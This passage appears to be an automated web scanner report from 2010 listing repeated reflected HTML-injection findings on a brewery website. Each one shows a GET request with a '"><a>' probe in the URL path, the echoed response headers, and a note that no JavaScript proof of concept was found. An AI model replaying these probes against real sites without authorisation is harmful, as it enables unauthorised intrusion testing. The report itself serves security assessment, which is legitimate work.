GET /media95c3f"><a>1b1450f199e/content/js/combined.js HTTP/1.1 Host: www.ninkasibrewing.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;
Response
HTTP/1.1 200 OK Date: Sun, 21 Nov 2010 21:53:51 GMT Server: Apache X-Powered-By: PHP/5.2.14 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Connection: close Vary: Accept-Encoding Content-Type: text/html Content-Length: 13210
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cc0d2"><a>96b73e45a3f was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /merchandisecc0d2"><a>96b73e45a3f/ HTTP/1.1 Host: www.ninkasibrewing.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.ninkasibrewing.com/ Cookie: PHPSESSID=lgog9cm9mfbve3sk8vts9buej4;
Response
HTTP/1.1 200 OK Date: Sun, 21 Nov 2010 21:45:14 GMT Server: Apache X-Powered-By: PHP/5.2.14 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Connection: close Vary: Accept-Encoding Content-Type: text/html Content-Length: 13222
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 22a36"><a>9072d5717d1 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /merchandise22a36"><a>9072d5717d1/content/css/basic.css HTTP/1.1 Host: www.ninkasibrewing.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;
Response
HTTP/1.1 200 OK Date: Sun, 21 Nov 2010 21:53:53 GMT Server: Apache X-Powered-By: PHP/5.2.14 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Connection: close Vary: Accept-Encoding Content-Type: text/html Content-Length: 13222
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 25227"><a>b79974bebcc was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /merchandise25227"><a>b79974bebcc/content/css/ninkasi.css HTTP/1.1 Host: www.ninkasibrewing.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;
Response
HTTP/1.1 200 OK Date: Sun, 21 Nov 2010 21:53:54 GMT Server: Apache X-Powered-By: PHP/5.2.14 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Connection: close Vary: Accept-Encoding Content-Type: text/html Content-Length: 13222
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 89685"><a>8d9b398e636 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /merchandise89685"><a>8d9b398e636/content/css/print.css HTTP/1.1 Host: www.ninkasibrewing.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;
Response
HTTP/1.1 200 OK Date: Sun, 21 Nov 2010 21:53:54 GMT Server: Apache X-Powered-By: PHP/5.2.14 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Connection: close Vary: Accept-Encoding Content-Type: text/html Content-Length: 13222
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3bca3"><a>74020e256ae was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /merchandise3bca3"><a>74020e256ae/content/js/basic.js HTTP/1.1 Host: www.ninkasibrewing.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;
Response
HTTP/1.1 200 OK Date: Sun, 21 Nov 2010 21:53:55 GMT Server: Apache X-Powered-By: PHP/5.2.14 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Connection: close Vary: Accept-Encoding Content-Type: text/html Content-Length: 13222
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d3133"><a>eb248c2c902 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /merchandised3133"><a>eb248c2c902/content/js/combined.css HTTP/1.1 Host: www.ninkasibrewing.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;
Response
HTTP/1.1 200 OK Date: Sun, 21 Nov 2010 21:53:59 GMT Server: Apache X-Powered-By: PHP/5.2.14 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Connection: close Vary: Accept-Encoding Content-Type: text/html Content-Length: 13222
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ea445"><a>ad2f0e43886 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /merchandiseea445"><a>ad2f0e43886/content/js/combined.js HTTP/1.1 Host: www.ninkasibrewing.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;
Response
HTTP/1.1 200 OK Date: Sun, 21 Nov 2010 21:54:01 GMT Server: Apache X-Powered-By: PHP/5.2.14 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Connection: close Vary: Accept-Encoding Content-Type: text/html Content-Length: 13222
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload db203"><a>4f8704b46ee was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /nw_local_challengedb203"><a>4f8704b46ee/ HTTP/1.1 Host: www.ninkasibrewing.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.ninkasibrewing.com/ Cookie: PHPSESSID=lgog9cm9mfbve3sk8vts9buej4;
Response
HTTP/1.1 200 OK Date: Sun, 21 Nov 2010 21:45:16 GMT Server: Apache X-Powered-By: PHP/5.2.14 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Connection: close Vary: Accept-Encoding Content-Type: text/html Content-Length: 13236
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 38544"><a>e12729cb39a was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /nw_local_challenge38544"><a>e12729cb39a/content/css/basic.css HTTP/1.1 Host: www.ninkasibrewing.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;
Response
HTTP/1.1 200 OK Date: Sun, 21 Nov 2010 21:53:59 GMT Server: Apache X-Powered-By: PHP/5.2.14 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Connection: close Vary: Accept-Encoding Content-Type: text/html Content-Length: 13236
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 81cc4"><a>8f45631c571 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /nw_local_challenge81cc4"><a>8f45631c571/content/css/ninkasi.css HTTP/1.1 Host: www.ninkasibrewing.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;
Response
HTTP/1.1 200 OK Date: Sun, 21 Nov 2010 21:54:05 GMT Server: Apache X-Powered-By: PHP/5.2.14 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Connection: close Vary: Accept-Encoding Content-Type: text/html Content-Length: 13236
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 54de6"><a>a3833a021cc was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /nw_local_challenge54de6"><a>a3833a021cc/content/css/print.css HTTP/1.1 Host: www.ninkasibrewing.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;
Response
HTTP/1.1 200 OK Date: Sun, 21 Nov 2010 21:54:05 GMT Server: Apache X-Powered-By: PHP/5.2.14 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Connection: close Vary: Accept-Encoding Content-Type: text/html Content-Length: 13236
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 95d04"><a>66d6e311014 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /nw_local_challenge95d04"><a>66d6e311014/content/js/basic.js HTTP/1.1 Host: www.ninkasibrewing.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;
Response
HTTP/1.1 200 OK Date: Sun, 21 Nov 2010 21:54:09 GMT Server: Apache X-Powered-By: PHP/5.2.14 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Connection: close Vary: Accept-Encoding Content-Type: text/html Content-Length: 13236
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c482f"><a>c37a6af9fd4 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /nw_local_challengec482f"><a>c37a6af9fd4/content/js/combined.css HTTP/1.1 Host: www.ninkasibrewing.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;
Response
HTTP/1.1 200 OK Date: Sun, 21 Nov 2010 21:54:10 GMT Server: Apache X-Powered-By: PHP/5.2.14 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Connection: close Vary: Accept-Encoding Content-Type: text/html Content-Length: 13236
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fa881"><a>c321163ae3c was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /nw_local_challengefa881"><a>c321163ae3c/content/js/combined.js HTTP/1.1 Host: www.ninkasibrewing.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;
Response
HTTP/1.1 200 OK Date: Sun, 21 Nov 2010 21:54:08 GMT Server: Apache X-Powered-By: PHP/5.2.14 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Connection: close Vary: Accept-Encoding Content-Type: text/html Content-Length: 13236
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7a9d3"><a>dfa1e21e09f was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /process7a9d3"><a>dfa1e21e09f/ HTTP/1.1 Host: www.ninkasibrewing.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PHPSESSID=lgog9cm9mfbve3sk8vts9buej4;
Response
HTTP/1.1 200 OK Date: Sun, 21 Nov 2010 21:45:17 GMT Server: Apache X-Powered-By: PHP/5.2.14 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Connection: close Vary: Accept-Encoding Content-Type: text/html Content-Length: 13214
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 92128"><a>951cf91d628 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /process92128"><a>951cf91d628/content/css/basic.css HTTP/1.1 Host: www.ninkasibrewing.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;
Response
HTTP/1.1 200 OK Date: Sun, 21 Nov 2010 21:54:12 GMT Server: Apache X-Powered-By: PHP/5.2.14 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Connection: close Vary: Accept-Encoding Content-Type: text/html Content-Length: 13214
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload da51d"><a>b4ca083e972 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /processda51d"><a>b4ca083e972/content/css/ninkasi.css HTTP/1.1 Host: www.ninkasibrewing.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;
Response
HTTP/1.1 200 OK Date: Sun, 21 Nov 2010 21:54:10 GMT Server: Apache X-Powered-By: PHP/5.2.14 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Connection: close Vary: Accept-Encoding Content-Type: text/html Content-Length: 13214
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 464a8"><a>b51a0c71a0d was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /process464a8"><a>b51a0c71a0d/content/css/print.css HTTP/1.1 Host: www.ninkasibrewing.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;
Response
HTTP/1.1 500 Internal Server Error Date: Sun, 21 Nov 2010 21:54:11 GMT Server: Apache X-Powered-By: PHP/5.2.14 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Connection: close Vary: Accept-Encoding Content-Type: text/html
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6e00c"><a>fc68d60c0f3 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /process6e00c"><a>fc68d60c0f3/content/js/basic.js HTTP/1.1 Host: www.ninkasibrewing.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;
Response
HTTP/1.1 200 OK Date: Sun, 21 Nov 2010 21:54:13 GMT Server: Apache X-Powered-By: PHP/5.2.14 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Connection: close Vary: Accept-Encoding Content-Type: text/html Content-Length: 13214
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3479d"><a>5af2bfd9467 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /process3479d"><a>5af2bfd9467/content/js/combined.css HTTP/1.1 Host: www.ninkasibrewing.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;
Response
HTTP/1.1 200 OK Date: Sun, 21 Nov 2010 21:54:16 GMT Server: Apache X-Powered-By: PHP/5.2.14 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Connection: close Vary: Accept-Encoding Content-Type: text/html Content-Length: 13214
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8ec8c"><a>3f99d872435 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /process8ec8c"><a>3f99d872435/content/js/combined.js HTTP/1.1 Host: www.ninkasibrewing.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;
Response
HTTP/1.1 200 OK Date: Sun, 21 Nov 2010 21:54:17 GMT Server: Apache X-Powered-By: PHP/5.2.14 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Connection: close Vary: Accept-Encoding Content-Type: text/html Content-Length: 13214
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 382ed"><a>c4b55899033 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /tasting_room382ed"><a>c4b55899033/ HTTP/1.1 Host: www.ninkasibrewing.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.ninkasibrewing.com/ Cookie: PHPSESSID=lgog9cm9mfbve3sk8vts9buej4;
Response
HTTP/1.1 200 OK Date: Sun, 21 Nov 2010 21:45:16 GMT Server: Apache X-Powered-By: PHP/5.2.14 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Connection: close Vary: Accept-Encoding Content-Type: text/html Content-Length: 13224
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e70ae"><a>5db925a41c was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /tasting_roome70ae"><a>5db925a41c/content/css/basic.css HTTP/1.1 Host: www.ninkasibrewing.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;
Response
